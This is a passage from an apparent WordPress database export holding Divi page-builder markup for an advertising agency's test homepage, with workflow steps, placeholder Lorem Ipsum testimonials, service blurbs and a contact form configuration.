animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','publish','closed','closed','','home-new','','','2020-08-07 20:35:56','2020-08-07 20:35:56','',0,'https://wthtest1.in8.cdn-alpha.com/?page_id=564',0,'page','',0),(565,1,'2020-08-07 19:46:48','2020-08-07 19:46:48','<!-- wp:divi/placeholder /-->','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 19:46:48','2020-08-07 19:46:48','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(566,1,'2020-08-07 19:49:02','2020-08-07 19:49:02','','background-split-03-1','','inherit','open','closed','','background-split-03-1','','','2020-08-07 19:49:02','2020-08-07 19:49:02','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg',0,'attachment','image/jpeg',0),(569,1,'2020-08-07 19:53:53','2020-08-07 19:53:53','[et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" hover_enabled=\"0\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\" template_type=\"module\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text]','Banner header WTH','','publish','closed','closed','','banner-header-wth','','','2020-08-07 19:53:53','2020-08-07 19:53:53','',0,'https://wthtest1.in8.cdn-alpha.com/et_pb_layout/banner-header-wth/',0,'et_pb_layout','',0),(571,1,'2020-08-07 19:55:10','2020-08-07 19:55:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" width=\"100%\" width_tablet=\"100%\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1 style=\"text-align: center;\">Creative<br /> <span style=\"color: #353740;\">Design Agency</span></h1>\n[/et_pb_text][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\" global_module=\"569\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" parallax=\"on\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" 